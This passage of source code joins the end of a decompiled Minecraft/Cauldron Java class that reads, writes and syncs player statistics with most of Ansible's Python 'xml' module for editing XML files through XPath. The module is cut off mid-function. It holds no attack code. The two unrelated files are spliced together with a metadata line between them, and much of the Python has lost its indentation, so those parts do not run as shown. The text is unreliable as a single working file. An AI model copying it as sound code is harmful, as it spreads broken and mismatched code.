this.field_150887_d = p_i45306_2_;
}
public void func_150882_a()
{
if (this.field_150887_d.isFile())
{
try
{
this.field_150875_a.clear();
this.field_150875_a.putAll(this.func_150881_a(FileUtils.readFileToString(this.field_150887_d)));
}
catch (IOException ioexception)
{
logger.error("Couldn\'t read statistics file " + this.field_150887_d, ioexception);
}
catch (JsonParseException jsonparseexception)
{
logger.error("Couldn\'t parse statistics file " + this.field_150887_d, jsonparseexception);
}
}
}
public void func_150883_b()
{
try
{
FileUtils.writeStringToFile(this.field_150887_d, func_150880_a(this.field_150875_a));
}
catch (IOException ioexception)
{
logger.error("Couldn\'t save stats", ioexception);
}
}
public void func_150873_a(EntityPlayer p_150873_1_, StatBase p_150873_2_, int p_150873_3_)
{
int j = p_150873_2_.isAchievement() ? this.writeStat(p_150873_2_) : 0;
super.func_150873_a(p_150873_1_, p_150873_2_, p_150873_3_);
this.field_150888_e.add(p_150873_2_);
if (p_150873_2_.isAchievement() && j == 0 && p_150873_3_ > 0)
{
this.field_150886_g = true;
if (this.field_150890_c.func_147136_ar())
{
this.field_150890_c.getConfigurationManager().sendChatMsg(new ChatComponentTranslation("chat.type.achievement", new Object[] {p_150873_1_.func_145748_c_(), p_150873_2_.func_150955_j()}));
}
}
}
public Set func_150878_c()
{
HashSet hashset = Sets.newHashSet(this.field_150888_e);
this.field_150888_e.clear();
this.field_150886_g = false;
return hashset;
}
public Map func_150881_a(String p_150881_1_)
{
JsonElement jsonelement = (new JsonParser()).parse(p_150881_1_);
if (!jsonelement.isJsonObject())
{
return Maps.newHashMap();
}
else
{
JsonObject jsonobject = jsonelement.getAsJsonObject();
HashMap hashmap = Maps.newHashMap();
Iterator iterator = jsonobject.entrySet().iterator();
while (iterator.hasNext())
{
Entry entry = (Entry)iterator.next();
StatBase statbase = StatList.func_151177_a((String)entry.getKey());
if (statbase != null)
{
TupleIntJsonSerializable tupleintjsonserializable = new TupleIntJsonSerializable();
if (((JsonElement)entry.getValue()).isJsonPrimitive() && ((JsonElement)entry.getValue()).getAsJsonPrimitive().isNumber())
{
tupleintjsonserializable.setIntegerValue(((JsonElement)entry.getValue()).getAsInt());
}
else if (((JsonElement)entry.getValue()).isJsonObject())
{
JsonObject jsonobject1 = ((JsonElement)entry.getValue()).getAsJsonObject();
if (jsonobject1.has("value") && jsonobject1.get("value").isJsonPrimitive() && jsonobject1.get("value").getAsJsonPrimitive().isNumber())
{
tupleintjsonserializable.setIntegerValue(jsonobject1.getAsJsonPrimitive("value").getAsInt());
}
if (jsonobject1.has("progress") && statbase.func_150954_l() != null)
{
try
{
Constructor constructor = statbase.func_150954_l().getConstructor(new Class[0]);
IJsonSerializable ijsonserializable = (IJsonSerializable)constructor.newInstance(new Object[0]);
ijsonserializable.func_152753_a(jsonobject1.get("progress"));
tupleintjsonserializable.setJsonSerializableValue(ijsonserializable);
}
catch (Throwable throwable)
{
logger.warn("Invalid statistic progress in " + this.field_150887_d, throwable);
}
}
}
hashmap.put(statbase, tupleintjsonserializable);
}
else
{
logger.warn("Invalid statistic in " + this.field_150887_d + ": Don\'t know what " + (String)entry.getKey() + " is");
}
}
return hashmap;
}
}
public static String func_150880_a(Map p_150880_0_)
{
JsonObject jsonobject = new JsonObject();
Iterator iterator = p_150880_0_.entrySet().iterator();
while (iterator.hasNext())
{
Entry entry = (Entry)iterator.next();
if (((TupleIntJsonSerializable)entry.getValue()).getJsonSerializableValue() != null)
{
JsonObject jsonobject1 = new JsonObject();
jsonobject1.addProperty("value", Integer.valueOf(((TupleIntJsonSerializable)entry.getValue()).getIntegerValue()));
try
{
jsonobject1.add("progress", ((TupleIntJsonSerializable)entry.getValue()).getJsonSerializableValue().getSerializableElement());
}
catch (Throwable throwable)
{
logger.warn("Couldn\'t save statistic " + ((StatBase)entry.getKey()).func_150951_e() + ": error serializing progress", throwable);
}
jsonobject.add(((StatBase)entry.getKey()).statId, jsonobject1);
}
else
{
jsonobject.addProperty(((StatBase)entry.getKey()).statId, Integer.valueOf(((TupleIntJsonSerializable)entry.getValue()).getIntegerValue()));
}
}
return jsonobject.toString();
}
public void func_150877_d()
{
Iterator iterator = this.field_150875_a.keySet().iterator();
while (iterator.hasNext())
{
StatBase statbase = (StatBase)iterator.next();
this.field_150888_e.add(statbase);
}
}
public void func_150876_a(EntityPlayerMP p_150876_1_)
{
int i = this.field_150890_c.getTickCounter();
HashMap hashmap = Maps.newHashMap();
if (this.field_150886_g || i - this.field_150885_f > 300)
{
this.field_150885_f = i;
Iterator iterator = this.func_150878_c().iterator();
while (iterator.hasNext())
{
StatBase statbase = (StatBase)iterator.next();
hashmap.put(statbase, Integer.valueOf(this.writeStat(statbase)));
}
}
p_150876_1_.playerNetServerHandler.sendPacket(new S37PacketStatistics(hashmap));
}
public void func_150884_b(EntityPlayerMP p_150884_1_)
{
HashMap hashmap = Maps.newHashMap();
Iterator iterator = AchievementList.achievementList.iterator();
while (iterator.hasNext())
{
Achievement achievement = (Achievement)iterator.next();
if (this.hasAchievementUnlocked(achievement))
{
hashmap.put(achievement, Integer.valueOf(this.writeStat(achievement)));
this.field_150888_e.remove(achievement);
}
}
p_150884_1_.playerNetServerHandler.sendPacket(new S37PacketStatistics(hashmap));
}
public boolean func_150879_e()
{
    // True when a stat sync to the client has been requested; consumed by
    // func_150876_a to bypass the 300-tick throttle.
    return this.field_150886_g;
}
} | xtrafrancyz/Cauldron | eclipse/cauldron/src/main/java/net/minecraft/stats/StatisticsFile.java | Java | gpl-3.0 | 9,353 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Red Hat, Inc.
# Copyright: (c) 2014, Tim Bielawa <tbielawa@redhat.com>
# Copyright: (c) 2014, Magnus Hedemark <mhedemar@redhat.com>
# Copyright: (c) 2017, Dag Wieers <dag@wieers.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: xml
short_description: Manage bits and pieces of XML files or strings
description:
- A CRUD-like interface to managing bits of XML files.
version_added: '2.4'
options:
path:
description:
- Path to the file to operate on.
- This file must exist ahead of time.
- This parameter is required, unless C(xmlstring) is given.
type: path
required: yes
aliases: [ dest, file ]
xmlstring:
description:
- A string containing XML on which to operate.
- This parameter is required, unless C(path) is given.
type: str
required: yes
xpath:
description:
- A valid XPath expression describing the item(s) you want to manipulate.
- Operates on the document root, C(/), by default.
type: str
namespaces:
description:
- The namespace C(prefix:uri) mapping for the XPath expression.
- Needs to be a C(dict), not a C(list) of items.
type: dict
state:
description:
- Set or remove an xpath selection (node(s), attribute(s)).
type: str
choices: [ absent, present ]
default: present
aliases: [ ensure ]
attribute:
description:
- The attribute to select when using parameter C(value).
- This is a string, not prepended with C(@).
type: raw
value:
description:
- Desired state of the selected attribute.
- Either a string, or to unset a value, the Python C(None) keyword (YAML Equivalent, C(null)).
- Elements default to no value (but present).
- Attributes default to an empty string.
type: raw
add_children:
description:
- Add additional child-element(s) to a selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: list
set_children:
description:
- Set the child-element(s) of a selected element for a given C(xpath).
- Removes any existing children.
- Child elements must be specified as in C(add_children).
- This parameter requires C(xpath) to be set.
type: list
count:
description:
- Search for a given C(xpath) and provide the count of any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
print_match:
description:
- Search for a given C(xpath) and print out any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
pretty_print:
description:
- Pretty print XML output.
type: bool
default: no
content:
description:
- Search for a given C(xpath) and get content.
- This parameter requires C(xpath) to be set.
type: str
choices: [ attribute, text ]
input_type:
description:
- Type of input for C(add_children) and C(set_children).
type: str
choices: [ xml, yaml ]
default: yaml
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
strip_cdata_tags:
description:
- Remove CDATA tags surrounding text values.
- Note that this might break your XML file if text values contain characters that could be interpreted as XML.
type: bool
default: no
version_added: '2.7'
insertbefore:
description:
- Add additional child-element(s) before the first selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
insertafter:
description:
- Add additional child-element(s) after the last selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
requirements:
- lxml >= 2.3.0
notes:
- Use the C(--check) and C(--diff) options when testing your expressions.
- The diff output is automatically pretty-printed, so may not reflect the actual file content, only the file structure.
- This module does not handle complicated xpath expressions, so limit xpath selectors to simple expressions.
- Beware that in case your XML elements are namespaced, you need to use the C(namespaces) parameter, see the examples.
- Namespaces prefix should be used for all children of an element where namespace is defined, unless another namespace is defined for them.
seealso:
- name: Xml module development community wiki
description: More information related to the development of this xml module.
link: https://github.com/ansible/community/wiki/Module:-xml
- name: Introduction to XPath
description: A brief tutorial on XPath (w3schools.com).
link: https://www.w3schools.com/xml/xpath_intro.asp
- name: XPath Reference document
description: The reference documentation on XSLT/XPath (developer.mozilla.org).
link: https://developer.mozilla.org/en-US/docs/Web/XPath
author:
- Tim Bielawa (@tbielawa)
- Magnus Hedemark (@magnus919)
- Dag Wieers (@dagwieers)
'''
EXAMPLES = r'''
# Consider the following XML file:
#
# <business type="bar">
# <name>Tasty Beverage Co.</name>
# <beers>
# <beer>Rochefort 10</beer>
# <beer>St. Bernardus Abbot 12</beer>
# <beer>Schlitz</beer>
# </beers>
# <rating subjective="true">10</rating>
# <website>
# <mobilefriendly/>
# <address>http://tastybeverageco.com</address>
# </website>
# </business>
- name: Remove the 'subjective' attribute of the 'rating' element
xml:
path: /foo/bar.xml
xpath: /business/rating/@subjective
state: absent
- name: Set the rating to '11'
xml:
path: /foo/bar.xml
xpath: /business/rating
value: 11
# Retrieve and display the number of nodes
- name: Get count of 'beers' nodes
xml:
path: /foo/bar.xml
xpath: /business/beers/beer
count: yes
register: hits
- debug:
var: hits.count
# Example where parent XML nodes are created automatically
- name: Add a 'phonenumber' element to the 'business' element
xml:
path: /foo/bar.xml
xpath: /business/phonenumber
value: 555-555-1234
- name: Add several more beers to the 'beers' element
xml:
path: /foo/bar.xml
xpath: /business/beers
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
- name: Add several more beers to the 'beers' element and add them before the 'Rochefort 10' element
xml:
path: /foo/bar.xml
    xpath: '/business/beers/beer[text()="Rochefort 10"]'
insertbefore: yes
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
# NOTE: The 'state' defaults to 'present' and 'value' defaults to 'null' for elements
- name: Add a 'validxhtml' element to the 'website' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
- name: Add an empty 'validatedon' attribute to the 'validxhtml' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml/@validatedon
- name: Add or modify an attribute, add element if needed
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
attribute: validatedon
value: 1976-08-05
# How to read an attribute value and access it in Ansible
- name: Read attribute value
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
content: attribute
attribute: validatedon
register: xmlresp
- name: Show attribute value
debug:
var: xmlresp.matches[0].validxhtml.validatedon
- name: Remove all children from the 'website' element (option 1)
xml:
path: /foo/bar.xml
xpath: /business/website/*
state: absent
- name: Remove all children from the 'website' element (option 2)
xml:
path: /foo/bar.xml
xpath: /business/website
children: []
# In case of namespaces, like in below XML, they have to be explicitly stated.
#
# <foo xmlns="http://x.test" xmlns:attr="http://z.test">
# <bar>
# <baz xmlns="http://y.test" attr:my_namespaced_attribute="true" />
# </bar>
# </foo>
# NOTE: There is the prefix 'x' in front of the 'bar' element, too.
- name: Set namespaced '/x:foo/x:bar/y:baz/@z:my_namespaced_attribute' to 'false'
xml:
path: foo.xml
xpath: /x:foo/x:bar/y:baz
namespaces:
x: http://x.test
y: http://y.test
z: http://z.test
attribute: z:my_namespaced_attribute
value: 'false'
'''
RETURN = r'''
actions:
description: A dictionary with the original xpath, namespaces and state.
type: dict
returned: success
  sample: {xpath: xpath, namespaces: [namespace1, namespace2], state: present}
backup_file:
description: The name of the backup file that was created
type: str
returned: when backup=yes
sample: /path/to/file.xml.1942.2017-08-24@14:16:01~
count:
description: The count of xpath matches.
type: int
returned: when parameter 'count' is set
sample: 2
matches:
description: The xpath matches found.
type: list
returned: when parameter 'print_match' is set
msg:
description: A message related to the performed action(s).
type: str
returned: always
xmlstring:
description: An XML string of the resulting output.
type: str
returned: when parameter 'xmlstring' is set
'''
import copy
import json
import os
import re
import traceback
from distutils.version import LooseVersion
from io import BytesIO
try:
from lxml import etree, objectify
HAS_LXML = True
except ImportError:
HAS_LXML = False
from ansible.module_utils.basic import AnsibleModule, json_dict_bytes_to_unicode
from ansible.module_utils.six import iteritems, string_types
from ansible.module_utils._text import to_bytes, to_native
from ansible.module_utils.common._collections_compat import MutableMapping
# Building blocks for the "simple XPath" grammar understood by
# split_xpath_last(): an XML identifier, optionally namespace-prefixed.
_IDENT = r"[a-zA-Z-][a-zA-Z0-9_\-\.]*"
_NSIDENT = _IDENT + "|" + _IDENT + ":" + _IDENT
# Note: we can't reasonably support the 'if you need to put both ' and " in a string, concatenate
# strings wrapped by the other delimiter' XPath trick, especially as simple XPath.
_XPSTR = "('(?:.*)'|\"(?:.*)\")"

# /foo/bar            -> create element 'bar'
_RE_SPLITSIMPLELAST = re.compile("^(.*)/(" + _NSIDENT + ")$")
# /foo/bar/text()='v' -> create element 'bar' with inner text 'v'
_RE_SPLITSIMPLELASTEQVALUE = re.compile("^(.*)/(" + _NSIDENT + ")/text\\(\\)=" + _XPSTR + "$")
# /foo/@attr          -> create attribute 'attr'
_RE_SPLITSIMPLEATTRLAST = re.compile("^(.*)/(@(?:" + _NSIDENT + "))$")
# /foo/@attr='v'      -> create attribute 'attr' with value 'v'
_RE_SPLITSIMPLEATTRLASTEQVALUE = re.compile("^(.*)/(@(?:" + _NSIDENT + "))=" + _XPSTR + "$")
# /foo/bar[pred]      -> create element 'bar' satisfying the predicate(s)
_RE_SPLITSUBLAST = re.compile("^(.*)/(" + _NSIDENT + ")\\[(.*)\\]$")
# /foo/text()='v'     -> set inner text of an existing element
_RE_SPLITONLYEQVALUE = re.compile("^(.*)/text\\(\\)=" + _XPSTR + "$")
def has_changed(doc):
    """Return True when `doc` differs from the module-global `orig_doc`.

    Both trees are round-tripped through lxml.objectify so that purely
    cosmetic serialization differences do not count as a change.
    """
    before = etree.tostring(objectify.fromstring(etree.tostring(orig_doc)))
    after = etree.tostring(objectify.fromstring(etree.tostring(doc)))
    return before != after
def do_print_match(module, tree, xpath, namespaces):
    """Report the document path of every node matched by `xpath` and exit
    through finish() (which calls module.exit_json)."""
    matched_paths = [tree.getpath(m) for m in tree.xpath(xpath, namespaces=namespaces)]
    msg = "selector '%s' match: %s" % (xpath, json.dumps(matched_paths))
    finish(module, tree, xpath, namespaces, changed=False, msg=msg)
def count_nodes(module, tree, xpath, namespaces):
    """ Return the count of nodes matching the xpath """
    # NOTE(review): the expression is interpolated after a leading '/', so an
    # absolute xpath like /a/b becomes count(//a/b), i.e. descendant-or-self
    # matching -- presumably intentional, confirm before changing.
    hits = tree.xpath("count(/%s)" % xpath, namespaces=namespaces)
    msg = "found %d nodes" % hits
    # finish() exits the module via exit_json; hitcount carries the result.
    finish(module, tree, xpath, namespaces, changed=False, msg=msg, hitcount=int(hits))
def is_node(tree, xpath, namespaces):
    """ Test if a given xpath matches anything and if that match is a node.
    For now we just assume you're only searching for one specific thing."""
    if not xpath_matches(tree, xpath, namespaces):
        return False
    # Only the first hit is inspected, matching the documented assumption.
    first_hit = tree.xpath(xpath, namespaces=namespaces)[0]
    return isinstance(first_hit, etree._Element)
def is_attribute(tree, xpath, namespaces):
    """ Test if a given xpath matches and that match is an attribute
    An xpath attribute search will only match one item"""
    if not xpath_matches(tree, xpath, namespaces):
        return False
    first_hit = tree.xpath(xpath, namespaces=namespaces)[0]
    # lxml represents attribute hits as smart-string results.
    return isinstance(first_hit, (etree._ElementStringResult, etree._ElementUnicodeResult))
def xpath_matches(tree, xpath, namespaces):
    """Return True when `xpath` selects at least one result in `tree`."""
    return True if tree.xpath(xpath, namespaces=namespaces) else False
def delete_xpath_target(module, tree, xpath, namespaces):
    """ Delete an attribute or element from a tree """
    # Any failure during deletion is reported via fail_json; on success the
    # module exits through finish().  NOTE(review): changed=True is reported
    # even when the xpath matched nothing -- confirm whether that is intended.
    try:
        for result in tree.xpath(xpath, namespaces=namespaces):
            # Get the xpath for this result
            if is_attribute(tree, xpath, namespaces):
                # Delete an attribute
                parent = result.getparent()
                # Pop this attribute match out of the parent
                # node's 'attrib' dict by using this match's
                # 'attrname' attribute for the key
                parent.attrib.pop(result.attrname)
            elif is_node(tree, xpath, namespaces):
                # Delete an element
                result.getparent().remove(result)
            else:
                raise Exception("Impossible error")
    except Exception as e:
        module.fail_json(msg="Couldn't delete xpath target: %s (%s)" % (xpath, e))
    else:
        finish(module, tree, xpath, namespaces, changed=True)
def replace_children_of(children, match):
    """Remove every existing child of `match`, then append `children` in order."""
    for existing in list(match.getchildren()):
        match.remove(existing)
    match.extend(children)
def set_target_children_inner(module, tree, xpath, namespaces, children, in_type):
    """Replace the children of every element matched by `xpath` with `children`
    (given in `in_type` format, 'xml' or 'yaml').  Returns True if any match
    was modified."""
    matches = tree.xpath(xpath, namespaces=namespaces)

    # Create a list of our new children
    children = children_to_nodes(module, children, in_type)
    children_as_string = [etree.tostring(c) for c in children]

    changed = False

    # xpaths always return matches as a list, so....
    for match in matches:
        # Check if elements differ
        if len(match.getchildren()) == len(children):
            for idx, element in enumerate(match.getchildren()):
                # Any single differing child triggers a full replacement.
                if etree.tostring(element) != children_as_string[idx]:
                    replace_children_of(children, match)
                    changed = True
                    break
        else:
            # Different child count: always replace.
            replace_children_of(children, match)
            changed = True

    return changed
def set_target_children(module, tree, xpath, namespaces, children, in_type):
    # Replace children on all matches, then report and exit via finish().
    changed = set_target_children_inner(module, tree, xpath, namespaces, children, in_type)
    # Write it out
    finish(module, tree, xpath, namespaces, changed=changed)
def add_target_children(module, tree, xpath, namespaces, children, in_type, insertbefore, insertafter):
    """Append (or insert, when insertbefore/insertafter is set) new child
    elements at every node matched by `xpath`, then exit via finish()."""
    if not is_node(tree, xpath, namespaces):
        # No matching element: report no change.
        finish(module, tree, xpath, namespaces)
        return

    new_children = children_to_nodes(module, children, in_type)

    if insertbefore or insertafter:
        insert_target_children(tree, xpath, namespaces, new_children, insertbefore, insertafter)
    else:
        for node in tree.xpath(xpath, namespaces=namespaces):
            node.extend(new_children)

    finish(module, tree, xpath, namespaces, changed=True)
def insert_target_children(tree, xpath, namespaces, children, insertbefore, insertafter):
    """
    Insert the given children before or after the given xpath. If insertbefore is True, it is inserted before the
    first xpath hit, with insertafter, it is inserted after the last xpath hit.

    :param tree: parsed lxml document tree
    :param xpath: expression selecting the anchor element(s)
    :param namespaces: prefix -> uri mapping used to evaluate `xpath`
    :param children: list of new lxml elements to insert
    :param insertbefore: insert before the first match
    :param insertafter: insert after the last match
    """
    insert_target = tree.xpath(xpath, namespaces=namespaces)
    # Anchor on the first hit for insertbefore, the last hit for insertafter.
    loc_index = 0 if insertbefore else -1
    anchor = insert_target[loc_index]
    # BUG FIX: take the parent from the same element the index was computed
    # from.  Previously the index of the anchor was used inside the *first*
    # hit's parent, which misplaces children when the xpath hits span
    # multiple parent elements.
    parent = anchor.getparent()
    index_in_parent = parent.index(anchor)
    if insertafter:
        index_in_parent += 1
    for child in children:
        parent.insert(index_in_parent, child)
        index_in_parent += 1
def _extract_xpstr(g):
return g[1:-1]
def split_xpath_last(xpath):
    """split an XPath of the form /foo/bar/baz into /foo/bar and baz

    Returns a tuple (parent_xpath, changes) where changes is a list of
    (element_or_attribute, value) pairs describing what must exist at the
    leaf.  An unrecognised expression yields (xpath, []); check_or_make_target
    treats that as unprocessable.  Pattern order matters: each regex is tried
    in turn and the first match wins.
    """
    xpath = xpath.strip()
    m = _RE_SPLITSIMPLELAST.match(xpath)
    if m:
        # requesting an element to exist
        return (m.group(1), [(m.group(2), None)])
    m = _RE_SPLITSIMPLELASTEQVALUE.match(xpath)
    if m:
        # requesting an element to exist with an inner text
        return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])

    m = _RE_SPLITSIMPLEATTRLAST.match(xpath)
    if m:
        # requesting an attribute to exist
        return (m.group(1), [(m.group(2), None)])
    m = _RE_SPLITSIMPLEATTRLASTEQVALUE.match(xpath)
    if m:
        # requesting an attribute to exist with a value
        return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])

    m = _RE_SPLITSUBLAST.match(xpath)
    if m:
        # element with a predicate: split "a and b" into separate conditions
        content = [x.strip() for x in m.group(3).split(" and ")]
        return (m.group(1), [('/' + m.group(2), content)])

    m = _RE_SPLITONLYEQVALUE.match(xpath)
    if m:
        # requesting a change of inner text
        return (m.group(1), [("", _extract_xpstr(m.group(2)))])
    return (xpath, [])
def nsnameToClark(name, namespaces):
    """Convert a prefixed name such as 'ns:tag' into Clark notation
    '{uri}tag' using the given prefix -> uri mapping; unprefixed names are
    returned unchanged."""
    if ":" not in name:
        # no namespace name here
        return name
    prefix, local = name.split(":")
    return "{" + namespaces[prefix] + "}" + local
def check_or_make_target(module, tree, xpath, namespaces):
    """Recursively create the nodes/attributes needed so that `xpath`
    references an existing node.  Returns True when the tree was modified.

    Works by splitting off the last xpath component, recursing on the parent
    path, then applying each (element-or-attribute, value) change at the
    leaf.  Fails the module when the expression cannot be decomposed.
    """
    (inner_xpath, changes) = split_xpath_last(xpath)
    if (inner_xpath == xpath) or (changes is None):
        # split_xpath_last made no progress: expression is not "simple" xpath.
        module.fail_json(msg="Can't process Xpath %s in order to spawn nodes! tree is %s" %
                             (xpath, etree.tostring(tree, pretty_print=True)))
        return False

    changed = False

    if not is_node(tree, inner_xpath, namespaces):
        changed = check_or_make_target(module, tree, inner_xpath, namespaces)

    # we test again after calling check_or_make_target
    if is_node(tree, inner_xpath, namespaces) and changes:
        for (eoa, eoa_value) in changes:
            if eoa and eoa[0] != '@' and eoa[0] != '/':
                # implicitly creating an element
                new_kids = children_to_nodes(module, [nsnameToClark(eoa, namespaces)], "yaml")
                if eoa_value:
                    for nk in new_kids:
                        nk.text = eoa_value

                for node in tree.xpath(inner_xpath, namespaces=namespaces):
                    node.extend(new_kids)
                changed = True
            # module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
            elif eoa and eoa[0] == '/':
                # element with a predicate: create it, then recurse so the
                # predicate conditions (sub-expressions) are satisfied too
                element = eoa[1:]
                new_kids = children_to_nodes(module, [nsnameToClark(element, namespaces)], "yaml")
                for node in tree.xpath(inner_xpath, namespaces=namespaces):
                    node.extend(new_kids)
                    for nk in new_kids:
                        for subexpr in eoa_value:
                            # module.fail_json(msg="element=%s subexpr=%s node=%s now tree=%s" %
                            #                      (element, subexpr, etree.tostring(node, pretty_print=True), etree.tostring(tree, pretty_print=True))
                            check_or_make_target(module, nk, "./" + subexpr, namespaces)
                changed = True
            # module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
            elif eoa == "":
                # setting inner text of the (now existing) parent element
                for node in tree.xpath(inner_xpath, namespaces=namespaces):
                    if (node.text != eoa_value):
                        node.text = eoa_value
                        changed = True
            elif eoa and eoa[0] == '@':
                # creating/updating an attribute
                attribute = nsnameToClark(eoa[1:], namespaces)

                for element in tree.xpath(inner_xpath, namespaces=namespaces):
                    changing = (attribute not in element.attrib or element.attrib[attribute] != eoa_value)

                    if changing:
                        changed = changed or changing
                        if eoa_value is None:
                            value = ""
                        else:
                            value = eoa_value
                        element.attrib[attribute] = value

                    # module.fail_json(msg="arf %s changing=%s as curval=%s changed tree=%s" %
                    #                      (xpath, changing, etree.tostring(tree, changing, element[attribute], pretty_print=True)))
            else:
                module.fail_json(msg="unknown tree transformation=%s" % etree.tostring(tree, pretty_print=True))

    return changed
def ensure_xpath_exists(module, tree, xpath, namespaces):
    """Create the node(s) addressed by `xpath` when missing, then report the
    outcome and exit via finish()."""
    changed = False if is_node(tree, xpath, namespaces) else check_or_make_target(module, tree, xpath, namespaces)
    finish(module, tree, xpath, namespaces, changed)
def set_target_inner(module, tree, xpath, namespaces, attribute, value):
    """Set the text (or, when `attribute` is given, that attribute) to `value`
    on every node matched by `xpath`, creating the target node first when
    necessary.  Returns True when the tree was modified."""
    changed = False

    try:
        if not is_node(tree, xpath, namespaces):
            changed = check_or_make_target(module, tree, xpath, namespaces)
    except Exception as e:
        missing_namespace = ""
        # NOTE: This checks only the namespaces defined in root element!
        # TODO: Implement a more robust check to check for child namespaces' existence
        if tree.getroot().nsmap and ":" not in xpath:
            missing_namespace = "XML document has namespace(s) defined, but no namespace prefix(es) used in xpath!\n"
        module.fail_json(msg="%sXpath %s causes a failure: %s\n -- tree is %s" %
                             (missing_namespace, xpath, e, etree.tostring(tree, pretty_print=True)), exception=traceback.format_exc())

    if not is_node(tree, xpath, namespaces):
        module.fail_json(msg="Xpath %s does not reference a node! tree is %s" %
                             (xpath, etree.tostring(tree, pretty_print=True)))

    # BUG FIX: resolve a prefixed attribute name to Clark notation once, up
    # front.  Previously the unresolved 'ns:attr' name was used for the
    # change check (element.get('ns:attr') is always None, so a change was
    # always reported), and the name was re-split on every loop iteration --
    # the already-resolved '{uri}attr' form still contains ':', raising
    # KeyError on the second matched element.
    if attribute and ":" in attribute:
        attr_ns, attr_name = attribute.split(":")
        # attribute = "{{%s}}%s" % (namespaces[attr_ns], attr_name)
        attribute = "{{{0}}}{1}".format(namespaces[attr_ns], attr_name)

    for element in tree.xpath(xpath, namespaces=namespaces):
        if not attribute:
            # Setting element text.
            changed = changed or (element.text != value)
            if element.text != value:
                element.text = value
        else:
            changed = changed or (element.get(attribute) != value)
            if element.get(attribute) != value:
                element.set(attribute, value)

    return changed
def set_target(module, tree, xpath, namespaces, attribute, value):
    # Apply the text/attribute change, then report and exit via finish().
    changed = set_target_inner(module, tree, xpath, namespaces, attribute, value)
    finish(module, tree, xpath, namespaces, changed)
def get_element_text(module, tree, xpath, namespaces):
    """Collect {tag: text} for every element matched by `xpath` and exit via
    finish(), exposing the results through `matches`."""
    if not is_node(tree, xpath, namespaces):
        module.fail_json(msg="Xpath %s does not reference a node!" % xpath)

    elements = [{element.tag: element.text} for element in tree.xpath(xpath, namespaces=namespaces)]

    finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def get_element_attr(module, tree, xpath, namespaces):
    """Collect {tag: {attr: value, ...}} for every element matched by `xpath`
    and exit via finish(), exposing the results through `matches`."""
    if not is_node(tree, xpath, namespaces):
        module.fail_json(msg="Xpath %s does not reference a node!" % xpath)

    elements = []
    for element in tree.xpath(xpath, namespaces=namespaces):
        attrs = dict((key, element.get(key)) for key in element.keys())
        elements.append({element.tag: attrs})

    finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def child_to_element(module, child, in_type):
    """Convert one child specification into an lxml element.

    For in_type == 'xml', `child` is a raw XML string and is parsed as-is.
    For in_type == 'yaml', `child` is either a bare tag name (string) or a
    single-key mapping {tag: value}, where value may itself be a mapping of
    attributes (with the reserved '_' key holding nested children).
    Any invalid input fails the module.
    """
    if in_type == 'xml':
        infile = BytesIO(to_bytes(child, errors='surrogate_or_strict'))

        try:
            parser = etree.XMLParser()
            node = etree.parse(infile, parser)
            return node.getroot()
        except etree.XMLSyntaxError as e:
            module.fail_json(msg="Error while parsing child element: %s" % e)
    elif in_type == 'yaml':
        if isinstance(child, string_types):
            # bare tag name -> empty element
            return etree.Element(child)
        elif isinstance(child, MutableMapping):
            if len(child) > 1:
                module.fail_json(msg="Can only create children from hashes with one key")

            (key, value) = next(iteritems(child))
            if isinstance(value, MutableMapping):
                # '_' carries nested children; the rest are attributes
                children = value.pop('_', None)

                node = etree.Element(key, value)

                if children is not None:
                    if not isinstance(children, list):
                        module.fail_json(msg="Invalid children type: %s, must be list." % type(children))

                    subnodes = children_to_nodes(module, children)
                    node.extend(subnodes)
            else:
                # scalar value -> element text
                node = etree.Element(key)
                node.text = value
            return node
        else:
            module.fail_json(msg="Invalid child type: %s. Children must be either strings or hashes." % type(child))
    else:
        module.fail_json(msg="Invalid child input type: %s. Type must be either xml or yaml." % in_type)
def children_to_nodes(module=None, children=None, type='yaml'):
    """turn a str/hash/list of str&hash into a list of elements"""
    nodes = []
    for child in (children or []):
        nodes.append(child_to_element(module, child, type))
    return nodes
def make_pretty(module, tree):
    """Re-serialize the document (optionally pretty-printed) and exit.

    With `path`, the file is rewritten (honouring check mode and `backup`)
    only when the serialized output differs from the file on disk.  With
    `xmlstring`, the re-serialized string is returned in the result.
    """
    xml_string = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])

    result = dict(
        changed=False,
    )

    if module.params['path']:
        xml_file = module.params['path']
        # Compare bytes on disk against the new serialization.
        with open(xml_file, 'rb') as xml_content:
            if xml_string != xml_content.read():
                result['changed'] = True
                if not module.check_mode:
                    if module.params['backup']:
                        result['backup_file'] = module.backup_local(module.params['path'])
